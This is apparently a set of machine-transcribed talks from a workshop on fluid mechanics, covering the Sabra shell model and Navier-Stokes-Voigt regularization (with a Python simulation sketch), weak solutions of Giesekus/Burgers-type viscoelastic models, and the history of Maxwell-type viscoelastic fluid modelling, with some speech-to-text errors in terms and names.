pressurizability condition so this is writing it as an infinite system of ordinary differential equations now inspired by that mathematical physicist wrote a simple model instead of having this infinite sum in the convolution like um and ul summation over all the m and all the the else equals to k they basically truncated and took 
that m and l around the wave number k, so they took m between k minus one and k plus one, and the same with l. So instead of an infinite convolution they made the interaction very localized in Fourier space and wrote a model which is called a shell model, a phenomenological analogue, and they said it is maybe easier to investigate numerically and to see what happens. So this is the particular model that I would like to talk about, and it is called the Sabra shell model, which has a similar structure to the Navier-Stokes equations. Here is the nonlinearity: you see that only the neighbouring wave numbers k_{n-1}, k_n, k_{n+1} appear, n is now the index, k_n plays the role of one derivative, k_n squared is like the Laplacian, and this is the nonlinearity; and they inserted a parameter epsilon in this equation. Now what happens is the following. If you look at this model, which is phenomenological, you realize that it has two conserved quantities. The first one is the sum of the moduli squared of the Fourier components, which is like the energy, and they discovered that there is another quadratic quantity, a weighted sum over n with weights (epsilon minus one) to the power minus n multiplying the moduli squared. Notice that epsilon is a parameter that they have, and now you have two options: either epsilon is bigger than one, and then you have something with algebraic weights, powers in n, multiplying the moduli squared, but it is positive, and this is like the enstrophy in 2D Navier-Stokes and Euler, namely the L2 norm of the vorticity, which is invariant; or epsilon is less than one, in which case the quantity is not sign definite, in fact it is alternating, and there is another quantity in 3D Euler and Navier-Stokes which is formally conserved, which is called the helicity. So what is nice about this model is that with one parameter, by changing epsilon, you can move structurally from 2D to 3D, not really as far as dimension is concerned, but in terms of the invariants. Now, why am I mentioning that? Because I would like to test some of our numerics on this model. So what people did: looking at the spectrum of the shell model, they realized that the shell amplitudes behave almost like k to the minus one third, which corresponds to the Kolmogorov minus five thirds energy spectrum expected in turbulence for Navier-Stokes. This gives people some assurance that at least this model, in the three-dimensional regime, when epsilon is less than one, has some of the nice structure functions of Navier-Stokes, and therefore one can try to push and conclude more about this equation. We can even see some intermittency; intermittency is basically the ratio of the fluctuation of the mean rate of dissipation of energy divided by the mean rate of dissipation of energy. This is what causes the bursts in the flow that you see in the Lagrangian picture: once in a while you see an eruption, and these spikes are the intermittency. They see it also in the shell model, and it is large, of order, this is epsilon prime over epsilon, up to 200 in time. Now, we studied this Sabra model together with Peter Constantin and my former student Boris Levant, and we proved all kinds of nice properties: global existence, uniqueness, the global attractor, even an inertial manifold; and even in the inviscid case we can show global existence of weak solutions in 3D, but we cannot prove uniqueness, and of course now one can probably try to see if one can
use the convex integration machinery and introduce it to this phenomenological model I am not very certain but nonetheless there is none uniqueness and the reason we wanted to study in this case because we wanted to prove the dissipation normally conjecture but that's a different story so now inspired by the Navier-Stokes Voigt one can go to the sabra model and introduce something similar and indeed this is the similar thing on the time derivative I put alpha square Laplacian so it's alpha square KN square and now this is the analog of Navier-Stokes Voigt sabra shell model why I want to introduce that not to investigate it analytically because I investigated the original one but I would like to do numerical simulation and to see what kind of features I see and do do they persist for Navier-Stokes or and or not so to go a little bit quicker this is some of the simulation for alpha 10 to the minus 6 and discuss it 10 to the minus 9 you see like the energy spectrum but we start realizing that alpha which is 10 to the minus 9 which is relatively not small enough and by small enough in comparison to the Kolmogorov-Link scale we start seeing that the inertial range here has some flat part in some sense that what inhibits the cascade of energy to a smaller scale and then boom after what you have the viscosity if now we take alpha smaller like between minus so here's like different values you see that the smallest value it is almost like like Navier-Stokes this flat part here it starts basically steepening and steepening to become like the Navier-Stokes in particular when alpha is a small smaller than Kolmogorov then we see exactly the same energy spectrum like the Navier-Stokes equation so this is an indication that maybe the statistics of Navier-Stokes Voight is mimicking the statistics of Navier-Stokes when alpha is very small because my time is almost over so we can so also that this model suppresses intermittency this is what what we had in the Navier-Stokes you see you get up to 200 in this intermittency these eruptions are very strong but then when alpha tends to the minus seven maximum you get here into about less than 120 in the intermittency for the same initial data and if you take even alpha larger you even almost suppress it completely less than 100 so in some sense this is regularizing the eruption of small scales which is exactly consistent with the fact that you have a global existence so now what happens when the limit alpha goes to zero do the statistics converge as I said we have indication in the numerics we have theorems I will go into the theorems about invariant measures for Navier-Stokes and for the Voight model without getting to details that's not really important but I would like just to mention a theorem that we have is the theorem that we have together with Fabio Ramos was my postdoc it's an old result giving a sequence of invariant measures for the three-dimensional Voight which we can establish they exist then there exists a subsequence alpha in goes to zero which is denoted by mu alpha n such that it has a limit which is a Borel measure in H1 and this Borel measure because you have conversions weekly in that sense and this Borel measure is a strong statistically stationary solutions of the 3D Navier-Stokes equation namely it's an invariant measures for the Navier-Stokes with statistical stationary solution so therefore averages with respect to these measures of quantities phi of u of some moments etc etc is good approximation for averages for Navier-Stokes which is 
exactly the theorem that we would like to talk about, and in particular we have something about the energy. I don't have much time to talk about it, so I will stop here. Thank you very much. Thank you, Edriss, thank you for the nice talk. Is there any question or comment? Please unmute yourself. Maybe I will just ask. Yeah, please go ahead. Yeah, Edriss, there are also models which are called second grade; is this similar? No, it is different. I see, I know what you are saying. You see, as I said at the very beginning, I started working with the Camassa-Holm or Navier-Stokes-alpha equations, and we started changing the models, motivated by comparison with experimental flows: we looked at the steady states of those models and compared them with the steady states observed experimentally, and then we derived what we called Leray-alpha. By the way, there is a model called Leray-alpha, and everybody, when they cite it, cites the paper of Leray; Leray has nothing to do with Leray-alpha. Okay, so we regularized the equation in a specific way, and then we realized that this is one of the kernels that Leray would have used, but it has nothing to do with that, it has extra properties and so forth. So what happened is that slowly we reached this model and said voila, we got a nice model which regularizes the equations. It is different from the second grade fluid model, because the nonlinearity here is smoother: it is u dot nabla u, it is not u dot nabla v where v is exactly u minus alpha squared Laplacian u, so it is more regular than that model. And this model without viscosity has global existence; the other one does not have this property. So it is different in that sense. The difference is that the nonlinearity here is u dot nabla u, while in their models it is u dot nabla v, and we realized that we do not need this extra nabla v, which is what allows existence even in the inviscid case.
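The kind of shell-model experiment described in this talk is easy to prototype. The following is a minimal illustrative sketch, not the speaker's code: it assumes the standard Sabra coefficients with a + b + c = 0, arbitrarily chosen parameter values, and a plain explicit Runge-Kutta time stepper; the Voigt regularization enters only through the factor 1 + alpha^2 k_n^2 dividing the right-hand side.

import numpy as np

# Voigt-regularized Sabra shell model (illustrative sketch, parameters arbitrary):
#   (1 + alpha^2 k_n^2) du_n/dt =
#       i*( a*k_{n+1}*u_{n+2}*conj(u_{n+1}) + b*k_n*u_{n+1}*conj(u_{n-1})
#           - c*k_{n-1}*u_{n-1}*u_{n-2} ) - nu*k_n^2*u_n + f_n,
#   k_n = k0*lam^n,  a + b + c = 0  (energy conservation when nu = f = 0).
N, k0, lam = 20, 1.0, 2.0
nu, alpha, eps = 1e-6, 1e-4, 0.5
a, b, c = 1.0, -eps, eps - 1.0
k = k0 * lam ** np.arange(N)
rng = np.random.default_rng(0)
u = 1e-3 * (rng.standard_normal(N) + 1j * rng.standard_normal(N)) / k
f = np.zeros(N, dtype=complex)
f[1] = 1e-2 * (1.0 + 1.0j)             # force a single large scale

def rhs(u):
    up1, up2 = np.roll(u, -1), np.roll(u, -2)
    um1, um2 = np.roll(u, 1), np.roll(u, 2)
    up1[-1] = up2[-1] = up2[-2] = 0.0  # no shells beyond the last one
    um1[0] = um2[0] = um2[1] = 0.0     # no shells before the first one
    nonlinear = 1j * (a * np.roll(k, -1) * up2 * np.conj(up1)
                      + b * k * up1 * np.conj(um1)
                      - c * np.roll(k, 1) * um1 * um2)
    return (nonlinear - nu * k**2 * u + f) / (1.0 + alpha**2 * k**2)  # Voigt factor

dt, steps = 1e-4, 100_000              # the explicit step must resolve the fastest shells
for _ in range(steps):                 # classical RK4 time stepping
    r1 = rhs(u); r2 = rhs(u + 0.5*dt*r1); r3 = rhs(u + 0.5*dt*r2); r4 = rhs(u + dt*r3)
    u = u + dt/6.0 * (r1 + 2*r2 + 2*r3 + r4)

spectrum = np.abs(u)**2 / k            # compare slopes for several values of alpha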
The Navier-Stokes-Voigt model of viscoelastic incompressible fluid has been proposed as a regularization of the three-dimensional Navier-Stokes equations for the purpose of direct numerical simulations. Besides the kinematic viscosity parameter, $\nu>0$, this model possesses a regularizing parameter, $\alpha> 0$, a given length scale parameter, so that $\frac{\alpha^2}{\nu}$ is the relaxation time of the viscoelastic fluid. In this talk I will derive several statistical properties of the invariant measures associated with the solutions of the three-dimensional Navier-Stokes-Voigt equations. Moreover, I will show that, for fixed viscosity, $\nu>0$, as the regularizing parameter $\alpha$ tends to zero, there exists a subsequence of probability invariant measures converging, in a suitable sense, to a strong stationary statistical solution of the three-dimensional Navier-Stokes equations, which is a regularized version of the notion of stationary statistical solutions - a generalization of the concept of invariant measure introduced and investigated by Foias. This fact is also supported by numerical observations, which provides an additional evidence that, for small values of the regularization parameter $\alpha$, the Navier-Stokes-Voigt model can indeed be considered as a model to study the statistical properties of the three-dimensional Navier-Stokes equations and turbulent flows via direct numerical simulations.
10.14288/1.0398185 (DOI)
Okay. Hello everyone. Thank you very much for the introduction. I am going to talk about viscoelastic rate type fluid models of Burgers type. Viscoelastic rate type models of higher order are used to describe materials with a complex microstructure, for example geomaterials like asphalt binders, some synthetic rubbers, and also biomaterials like the vitreous in the eye, because they are capable of capturing more relaxation mechanisms. We have some experimental results, which I mention in the references at the end, from this century: for example for the geomaterials, especially those asphalt binders, and also for synthetic rubbers; that one is very recent, it was done by Řehoř, I think in 2020. You will see some pictures of the bovine vitreous and of the asphalt at the beginning. The standard model that belongs to the rate type fluid models of second order is the model due to Burgers. We are in the incompressible setting, and in this talk I concentrate on the isothermal setting; in the formulation of the equations most of the constants are set equal to one. The first equation is the incompressibility condition. The second is the balance of momentum, where the non-Newtonian part of the Cauchy stress tensor S is such that this second order equation for S holds; the time derivative here is actually the upper convected Oldroyd derivative. It is an objective derivative, which means that if I rotate the tensor A by a rotation matrix Q, then the Oldroyd derivative of Q A Q transposed is equal to Q times the Oldroyd derivative of A times Q transposed. It is observer invariant, which the ordinary material time derivative would not be. But it is nonlinear, thanks to the terms gradient of v times A and A times gradient of v transposed, which makes the problem quite difficult. This setting for the Burgers model, or for the second order model, does not provide a priori estimates given by the data of the problem. When it is written as a second order equation, there is also a problem with giving an interpretation to the time derivative of S. However, there were some recent observations, by Málek, Rajagopal and Tůma in 2015: this setting for the Burgers model follows from the setting of a mixture of two Oldroyd-B models of the first order, where the non-Newtonian part of the Cauchy stress is a combination of tensors B1, B2 for which first order rate equations hold, provided that we set the right connection between the material parameters on this slide and the material parameters alphas and betas from the previous slide. As you see here, the setting for these two Oldroyd-B models then implies the formulation of the Burgers model of the second order which you saw on the previous slide. This viewpoint allows one to develop a whole hierarchy of Burgers type models from two models of the first order. Here in the terms Bi there are some exponents lambda. If lambda is equal to 1, then it corresponds to the mixture of two Oldroyd-B models. Here are models for lambdas from R, which can be derived from thermodynamic principles similar to those for the Oldroyd-B models, or for the mixture of the two Oldroyd-B models. The concept is that if we suppose that each Bi has the form Fi Fi transposed, with the determinant of Fi positive, then these are deformation tensors. The thermodynamic principle is that the deformation tensor can be split in a multiplicative way into a part that is elastic and a part that is inelastic.
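For readers who want the formulas behind this description, a common way of writing the objects involved is the following; this is a schematic version in the usual Oldroyd-B/Burgers notation, and the talk's normalization of the constants may differ.
\begin{align*}
&\overset{\triangledown}{\mathbb{A}} := \partial_t\mathbb{A} + (v\cdot\nabla)\mathbb{A} - (\nabla v)\,\mathbb{A} - \mathbb{A}\,(\nabla v)^{T} \qquad \text{(upper convected Oldroyd derivative)},\\
&\mathbb{S} = \mathbb{S}_1 + \mathbb{S}_2, \qquad \mathbb{S}_i + \tau_i\,\overset{\triangledown}{\mathbb{S}_i} = 2\eta_i\,\mathbb{D}(v), \quad i = 1,2,
\end{align*}
and eliminating $\mathbb{S}_1, \mathbb{S}_2$ yields a single rate equation of second order for the non-Newtonian stress $\mathbb{S}$, the Burgers form, whose coefficients are combinations of the relaxation times $\tau_i$ and the moduli $\eta_i$.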
Yes, and there is the condition that, yes, those Fi correspond to the elastic response of the i-th component of the body. And there are more relaxation mechanisms; here in this case we have two relaxation mechanisms, so we have i equal to 1 or 2. All those models come from constitutive equations relating the state variables, such as the density, velocity and temperature, with the stresses, fluxes, etc. Those constitutive equations must be formulated in order to get the whole system of equations. And the constitutive equations come from the choice of the free energy and the rate of entropy production. Let me briefly mention that the non-Newtonian part of the Helmholtz free energy, as you can see, takes its minimum if there is no deformation, if the tensor B responsible for the deformation is equal to the identity. And you may observe that if B is equal to the identity, then the elastic part of the free energy is equal to zero. So the elastic part of the free energy contains the deformation tensors B, it is frame invariant, it is non-negative, and it takes its minimum, equal to zero, when there is no deformation. So it sounds quite logical. In the isothermal setting the so-called reduced thermodynamic identity holds, in the form which you see here. And we sum it with the, let us say, energy equality for the kinetic energy, obtained from the balance of momentum multiplied scalarly by the velocity. From this reduced thermodynamic identity we see that all these models provide a priori estimates for the velocity and for the trace of B minus the logarithm of the determinant of B at time t, and these are estimated by the velocity and the trace of B minus the logarithm of the determinant of B at time zero. So it is obtained from the energy equality and from the reduced thermodynamic identity, where the free energy and the rate of entropy production have this form, and it is common to all models of this family. Now I am going to talk about mathematical results, especially about global solutions. For simplicity, let me in this talk consider only one deformation tensor; the second deformation tensor is then taken to be trivial. We obtain from the a priori estimates that the problems P lambda have the property that B is in L1 if lambda is less than or equal to zero, and the time derivative of B is integrable with respect to time if lambda is less than or equal to zero. There are very few results concerning global weak solutions of these rate type fluid models of, let us say, Burgers type, that is, of those models P lambda. For example, the question for the Oldroyd-B model is open. There is a result from 2000 by Lions and Masmoudi for a model similar to Oldroyd-B, but instead of the upper convected derivative they used an objective time derivative in which, instead of the gradient of v, only its antisymmetric part appears; this simplifies the analysis, but it does not come from the thermodynamical principles which I described before. In 2011, Masmoudi gave a sketch of the proof of weak sequential stability of weak solutions to the so-called Giesekus model; the Giesekus model is the case lambda equal to zero. Masmoudi gave us some very important ideas, but as I said, it is only a sketch of the proof and there are some mistakes.
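Schematically, the a priori bound described in this passage is the following energy balance, written with all material constants set to one as in the talk (the precise constants and the form of the entropy production in the paper may differ):
\begin{align*}
\int_{\Omega}\Big(\tfrac{1}{2}|v|^2 + \operatorname{tr}\mathbb{B} - \ln\det\mathbb{B}\Big)(t)\,dx + \int_0^t\!\!\int_{\Omega}\big(|\nabla v|^2 + \text{entropy production in }\mathbb{B}\big)\,dx\,ds \le \int_{\Omega}\Big(\tfrac{1}{2}|v|^2 + \operatorname{tr}\mathbb{B} - \ln\det\mathbb{B}\Big)(0)\,dx,
\end{align*}
and since $\operatorname{tr}\mathbb{B} - \ln\det\mathbb{B} = \sum_i(\lambda_i - \ln\lambda_i) \ge d$ for a positive definite $\mathbb{B}$ with eigenvalues $\lambda_i$ in dimension $d$, this quantity controls $\mathbb{B}$ both from above and away from degeneracy.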
So we decided to do it correctly, not to do even weak sequential stability, but to introduce also suitable approximations and to get mathematical sense of everything as well as we can. We were capable to do it in two dimensions and we were capable of considering two natural configurations, not only one, but two, B1 and B2 for both of them. The exponents lambdas are equal to zero. Yes, it is not a problem, but we are capable to do it only in two dimensions. Let me mention the domain theorem. So under the assumptions that omega is a bounded literature domain, in the assumptions of initial data and also the determinant of f times zero is positive and logarithm of the term f times zero is integrable over omega. We can find the weak solution to the so called generalized Burgers system. It is the quintuple of functions v, f and b that are in the spaces coming from the a priori estimates. They are also continuous with respect to time and their time derivatives are integrable with respect to time. Here you can see the weak formulation, the balance of momentum in the weak formulation and this is the equation for B in the weak formulation. The first four terms are b-aldroid and the rest is v squared minus b is equal to zero. And B must have the form f, f, i, t where the determinant of f, i is greater than zero. So under the assumptions on initial conditions and properties of the determinants of f at the initial time, we are capable to prove the existence of such weak solutions to the system which I have just described. Let me briefly say some crucial ideas about the proof. Now at this talk I will again comment the second tensor B2. I will only talk about the case when B2 is identically equal to zero and in the role of B1 there is B. Yes, I would have f, v, f and b satisfying this weak formulation. So the first crucial idea by, it was given by Masmoudi, it was to consider instead of equations for B equal to f, f, t only the equations for f. And some of this equation, yes, the equation one multiplied scalarly by f transpose from the right, then take transposition of one multiplied scalarly by f from left, gives after summation exactly the formulation of the equation for B, the order plus B squared minus B equal to zero. What are the advantages of this? The first advantage is that we are almost allowed to test the equation for f by its solution. We can prove the positivity of the determinant of f and we get the form B equal to f, f, t directly. Now let me talk briefly about the sequential stability. It is a very important part of the existence proof. So let us consider a sequence of solutions to the problem, balance of momentum and this equation one for f, sequence of weak solutions. We are capable of proof some uniform estimates and from these estimates we have sub sequences converging in some sense to V respectively to f, but not all terms are compact and we need to prove, yield bars denotes the weak limits and we need to prove that the weak limits are exactly what we want. And for this purpose it suffices to prove the compactness of the approximations f epsilon in L2. There are actually three main steps, how to do it. The starting point is to consider those two formulas. The first one is actually the equation for the approximate equation for f epsilon multiplied by f epsilon phi and taking the limit as epsilon goes to zero. The second it is the equation for f, test it or multiply it by f phi multiplied by f phi. 
And we will be interested about the quantity f squared bar minus f squared and to prove that it is equal to zero almost everywhere which is equivalent to the fact that f epsilon is compact in L2. For the first formula it suffices only in this inequality. Yes it needs to be equality, it suffices only in this inequality. So from step one we should we should derive something like it is prepared for using the ground wall slenna. Yes something like time derivative of the desired quantity f squared bar minus f squared is bounded by L f squared bar minus f squared well where L is an L2 duty function. And by using something like ground walls inequality we are capable of proving that f squared bar is equal to f squared so that the f epsilon are compact. We are not, yes well we are not allowed to use the ground wall element directly because the functions are not regular enough and also we do not know anything about the continuity about f squared bar. Yes we know about the continuity of f epsilon and about the continuity of f but not think about the continuity of f squared bar so that we must do some modification not only with respect to space but also with respect to time. We need to extend all functions by zero and then take modifications over time and space. And as you can see all derivatives are applied to the smooth test functions so that there is no problem to extend everything by zero outside of Qt and to use the fact that that from negative times and outside of omega the smooth functions are equal to zero and it is also equal to zero in some suitable sense after taking the limit. This was the part that was really not doomed but we did. Here I skipped how to prove the step two. I only commented how to get from step two the step three. Yes briefly and it is in mathematical symbols it is described here. So if l was regular enough small f it is the desired quantity where it was continuous with respect to time then it would be direct but it is not the case. So as I said we need to do time space modifying and renormalization to get this equation for inequality from the step two to get the renormalized inequality to extend it for the test functions supported up to the boundary of omega and then after choosing suitable renormalization function to get that the desired quantity f is just equal to zero that f squared bar minus f squared is equal to zero almost everywhere in QT which gives the compactness of approximation and it is a crucial point of weak sequential stability of approximations. I will probably have to finish I am sorry there is too much time. I also wanted to mention that we are capable of proof existence of the approximations v epsilon with properties described above and it is the same model but only with stress diffusion yes you have a priori esteem yes and we do it by work in Smith-Ott and I think we should try to wrap it up because you know we are already doing it over time yes I am very sorry from yes and we have here we have controls of gradient so from the galerkin level to the level of epsilon where we get the compactness of fn for three years yes there the problem about additional terms because the systems are for f epsilon and for f are not the same but it is easy to overcome them. I am very sorry for exceeding the limit and thank you very much for the attention. Okay well thank you very much.
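The reduction from the tensorial equation for B to an equation for F, which drives the compactness argument sketched above, rests on a purely algebraic identity. Here is a schematic version with all constants set to one; the precise form of the relaxation term in the paper may differ.
\begin{align*}
&\text{If}\quad \partial_t\mathbb{F} + (v\cdot\nabla)\mathbb{F} - (\nabla v)\,\mathbb{F} + \tfrac12\big(\mathbb{F}\mathbb{F}^{T} - \mathbb{I}\big)\mathbb{F} = 0 \quad\text{and}\quad \mathbb{B} := \mathbb{F}\mathbb{F}^{T}, \quad\text{then}\\
&\partial_t\mathbb{B} + (v\cdot\nabla)\mathbb{B} - (\nabla v)\,\mathbb{B} - \mathbb{B}\,(\nabla v)^{T} + \mathbb{B}^2 - \mathbb{B} = 0,
\end{align*}
that is, $\mathbb{B}$ solves the Giesekus-type equation; the advantage, as explained in the talk, is that the equation for $\mathbb{F}$ can (almost) be tested by $\mathbb{F}$ itself, the positivity of $\det\mathbb{F}$ can be propagated, and the form $\mathbb{B} = \mathbb{F}\mathbb{F}^{T}$ comes for free.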
Rate-type fluid models involving the stress and its observer-invariant time derivatives of higher order are used to describe a large class of viscoelastic mixtures - geomaterials like asphalt, biomaterials such as vitreous in the eye, synthetic rubbers such as SBR. A standard model that belongs to the category of viscoelastic rate-type fluid models of the second order is the model due to Burgers, which can be viewed as a mixture of two Oldroyd-B models of the first order. This viewpoint allows one to develop the whole hierarchy of generalized models of a Burgers type. We study one such generalization. Carrying on the study by Masmoudi (2011), who briefly proved the weak sequential stability of weak solutions to the Giesekus model, we prove long time and large data existence of weak solutions to a mixture of two Giesekus models in two spatial dimensions.
10.14288/1.0398190 (DOI)
Thank you for the introduction. So this is Sébastien Boyaval from the Laboratoire d'Hydraulique Saint-Venant, a hydraulics lab of École des Ponts, which means that I and my colleagues are mostly engineers working on natural water flows rather than mathematicians. So first I would like to thank the organizers for this interesting workshop. I would also like to acknowledge support by Claude Le Bris' group MATHERIALS, which is an Inria applied mathematics group. And last, I would like to dedicate this talk to someone many of us have known and with whom we shared the enthusiasm for mathematics and polymer fluids in particular, John Barrett, who passed away a bit more than one year ago. So I will talk today about a nonstandard viewpoint on viscoelastic stresses in fluids. I say nonstandard nowadays, because it forces me to come back to the origins, and it would not have been so unusual maybe a few decades ago. So let us come back to the foundation of viscoelastic stresses in fluids, and that forces me to start at the very beginning, where fluids begin. Fluids begin with the Euler model of what? Of the Eulerian description of the continuum. That means it uses field variables: let us recognize the velocity and the mass density, which depend only on the spatial coordinate x, living in a Euclidean ambient space, and it erases any dependence on the particle label, which had been made continuous by Lagrange, for instance. That model is now well understood as an expression of Hamilton's stationarity principle. It means you have an action, and you can recognize energy conservation and momentum conservation, where you use only these functions of the spatial coordinates. And of course momentum conservation at the level of smooth solutions is implied by those representations through what? The placement function, which is the configuration of the particles, whose label can be recovered through the inverse map, since we are working at that level with smooth configurations. And that model was successful. Why? Because, in particular, you can define motions univocally. In the minimal sense, a small time motion is well defined by what? By specifying an internal energy that depends only on the density. If you choose it well, the system is a well-known symmetric hyperbolic system, and then small time motions are well defined as soon as you work in the class of smooth functions with smooth initial configurations. Okay, so that is the beginning. Next, I would like to move on to real fluids, which people started to do soon after, I would say in the 19th century, mainly when Cauchy had consolidated continuum mechanics through the concept of stress; Cauchy was a professor at École des Ponts at that time. And people were looking for better models. For instance, if you start at the level of a symmetric hyperbolic system, causal motions that depend on time as a semigroup are well defined for real fluids, including some thermodynamic constraints, which were also being developed at that time. For instance, shocks are well defined, but only if you account, in addition to momentum and mechanics, for temperature; okay, I will not enter into that here, but I will rather discuss viscous imperfections. The introduction of viscosity at the level of a compressible continuum can only be justified as an extra stress which is purely entropic, if you consider the Newtonian law here, which people came up with after Navier, a professor at École des Ponts, through Saint-Venant, and similarly Poisson and Stokes.
So all those people came up with that formula, and we are now widely used to that model, although it has some fundamental defects: the stress is purely entropic, waves propagate at infinitely fast speed, and, more importantly, the constants, the bulk and shear viscosities, are not material parameters; they are dynamic constants, they depend on the configuration. That is why people came up with another question, and very soon after, Maxwell proposed a model that depends on material parameters to account for what? For viscosity in gases, as early as 1867. And to go forward, what he proposed is to interpret that empirical expression for viscous stresses as the relaxation limit of a model with a relaxation time, which is supposedly also a material constant. The problem is of course that at that time it was very difficult to measure such material parameters as the ones you see here in the original article of Maxwell: he called it E for the elasticity and T for the relaxation time, so the shear viscosity here is nothing but the elasticity multiplied by the relaxation time. So that was the problem, and the model was more or less forgotten for one century. And the question is now: when did it occur that it was useful? Only when people came up with real fluids that would allow for measurements of such things, especially after the Second World War, when people were very much interested in rubber and polymer fluids were attracting attention. Weissenberg, a mathematician, was one of the first to make the connection between the Maxwell model and polymer fluids; Eckart also made the connection. And they observed some features of the polymer fluids that, at the same time as making the model relevant, questioned the extension of the Maxwell model, which was 1D, to multi-dimensional flows. So that was the beginning of the question of how to make it multi-dimensional, and Oldroyd soon after came up with a concept, material frame indifference, which is a much stronger assumption than simple Galilean invariance. The extra stress, as concerns the viscoelastic stress, is required to be objective, to be independent of even a time-dependent rotation of the frame. It means you have a very constraining notion of acceptable extra stresses, and today this is a very well accepted formulation as a point of departure for viscoelastic fluid modelling. That framework is an incompressible model of fluid at, let us say, constant temperature; we will see later why this is a problem. They fix the density, and they add to the pressure two components which depend on the polymer suspension: the solvent one, which is purely viscous, and the polymer one, which is the Maxwell model transformed into a multi-dimensional version, where you recognize here an objective derivative; you have different choices, among the Gordon-Schowalter family of derivatives. And this would be the point of departure. Still, many questions arise. One was: could we account for shear thinning and shear thickening, which are things not really well captured by that model? And many people were struck by the, let us say, purely entropic dependence of the stress, so they started looking at the physical, statistical physics foundation of that formula for the entropic stress.
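To make the chronology concrete: Maxwell's one-dimensional element and one frame-indifferent tensor version of it (the upper convected Maxwell model, a member of the family of objective formulations mentioned above) read, schematically,
\begin{align*}
&\sigma + \tau\,\frac{d\sigma}{dt} = \eta\,\dot{\gamma}, \qquad \eta = E\,\tau \quad\text{(Maxwell's elasticity $E$ and relaxation time $\tau$)},\\
&\mathbb{S} + \tau\Big(\partial_t\mathbb{S} + (v\cdot\nabla)\mathbb{S} - (\nabla v)\,\mathbb{S} - \mathbb{S}\,(\nabla v)^{T}\Big) = 2\eta\,\mathbb{D}(v),
\end{align*}
and in the limit $\tau\to 0$ at fixed $\eta$ one formally recovers the Newtonian extra stress $\mathbb{S} = 2\eta\,\mathbb{D}(v)$.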
And the formula was readjusted by Ruth, and many people working with statistical physics interpretation of entropy. For instance, today I will stick to Maxwell model, but the question would be how to make the statistical physics suggest you a new formula for the entropy. So at that level, we could just stop and say this is a question for physicists. In fact, it echoes the presentation by Tony LeLieve, who showed us that you could come up with a very complicated model at the statistical physics level, and then try to infer an entropy, then an anthropic extra stress for the macroscopic level. Okay, this is indeed an art for statistical physics, and it could be justified from the continuum mechanics, I would say, purely macroscopic viewpoint today with what people sometimes call the metriplectic viewpoint. So generic is one instance of such a justification to explain where, how you can connect microscopic level with macroscopic level. Okay, today I will stick to the fact that it requires at some point the introduction for justification with a second principle expressing thermodynamics, it requires the introduction of another variables, let's call it C, and in that framework of statistical physics, it's a tensor interpreted as the expectation of this, second order, this matrix. Which is the conformation of X is a vector of the orientation and extension of a dumbbell, which follows typically a long-jouin equation, that means it is over-dumped long-jouin here. It is a static equilibrium of a polymer, of just a very basic polymer model with two beads and one spring, which is heated by that under-run mount at constant temperature. Okay, and the model, statistical physics can be worked around to came back to that purely macroscopic model through a formula, which I have put here. So this is called, okay, I have just forgotten the term of expression for the connection, for the stress formula. And okay, at that point, as I said, you could stop, but in fact, it raises still many questions and questions for engineers. So one question is, how can you use that actually for forecasts? And when you compare, so this is a problem as we'll explain just after, but it also raises the question of does it really account for temperature change, which we see in non-isothermal flows? And it doesn't. It turns out that even in rubber-like polymer frids, it turns out that some part of the elasticity is not purely entropic. That means only purely attributed to some diluted polymer molecules, but it is also linked to the deformation of the wool frids, like compressibility in a gas. It means then here to the suspension, if you may. And then other questions come. And before going to the one solution of that and a new formulation, a new interpretation of viscoelasticity, which I find beneficial to some mathematical understanding of the viscoelasticity. Let me mention here that if people often nowadays justify, for instance, that formula with an upper convective derivative for the stress linked to dumbbells, you can also just identify it here with the derivative associated to the Cauchy-Green deformation. So there is no necessity for such a link. So there are different links. Here are some. So the first thing I'd like to mention here is that the model you saw just before has been used extensively by many people and with engineering viewpoint, essentially. And the fact that you have infinitely fast propagation speed is written down in it because they work with an incompressibility assumption. 
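The stress formula whose name the speaker says he has forgotten is usually called the Kramers expression; in the Hookean dumbbell setting described above it reads, schematically (sign and normalization conventions vary),
\begin{align*}
\tau_p = n\,\langle X\otimes F_{\mathrm{spring}}(X)\rangle - n\,k_B T\,\mathbb{I}, \qquad F_{\mathrm{spring}}(X) = H X \;\Longrightarrow\; \tau_p = n\,k_B T\,(\mathbb{C} - \mathbb{I}),
\end{align*}
where $n$ is the dumbbell number density and $\mathbb{C} = \dfrac{H}{k_B T}\,\langle X\otimes X\rangle$ is the conformation tensor normalized by its equilibrium value.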
And usually they add some solvent viscosity, not only to account for the real physics but also so that the model is actually computable. And in fact, it turns out that those models have some instability, numerical instability, when you approach what I would call the purely elastic limit; when you think of Maxwell's simple model, it means when you have a very large relaxation time and you neglect the solvent contribution. Actually, people worked on the connection with elasticity, which is deeply linked with what I mentioned before, the non-isothermal flows. How was that tackled? It was tackled mostly by a different community, I believe: people from rational mechanics at that time, mechanicians with a strong mathematical background and maybe, unfortunately, a too obscure or too abstract formulation. So after Truesdell and Noll, they sometimes did not really come up with a practical, useful way, except for the K-BKZ model, which is a very specific fading memory material, where the conformation tensor, which you saw just before, has a very particular evolution law. In fact, since you can interpret it also from a purely macroscopic viewpoint here, and recall the derivative of the deformation tensor, you can make the connection at the purely macroscopic level. So that would be a nice different link, without statistical physics, to what? To hyperelasticity, and then to a model where viscoelasticity is linked not with pure entropy, but also with elasticity. There are other problems with that model. One of our attendees will confirm today that he did verify that the model was useful for mathematical interpretation. But the point is that the model has not been used very much, because it is quite difficult to use: you have to put that integral formula within the differential ones for the momentum balance. And within that framework, things like shear thinning, all those difficulties which are additional to the Maxwell fluid concept, could not really be treated. In fact, people could only change the formula here for what is called the fading memory kernel; they could invent different fading memories, but it was not really physical, it was rather abstract and not connected to real physics. And in fact it was not really useful, because what is shown in Michael Renardy's paper, I think, is that only the lower convected and upper convected Maxwell models are actually 100% well-posed, I mean, for very smooth initial conditions. Okay, there are plenty of assumptions, but they were the best models coming out of that study. So what I suggest today is to look at the link between viscoelasticity and hyperelasticity from a different viewpoint. And I will come up with a model which is a first-order system of conservation laws that extends the usual polyconvex elastodynamics of hyperelastic materials (I say polyconvex because that is what is needed for well-posedness, which is dealt with also elsewhere), and that allows what? Viscoelastic flows of Maxwell-type fluids, compressible of course, and then formally contains Navier-Stokes. The good point is that the elastic stresses, within this frame of viscoelastic stresses, are not purely entropic but have some energetic origin. Then shear waves can propagate at finite speed, and it still covers incompressible flows, asymptotically of course, in a low-Mach-number limit.
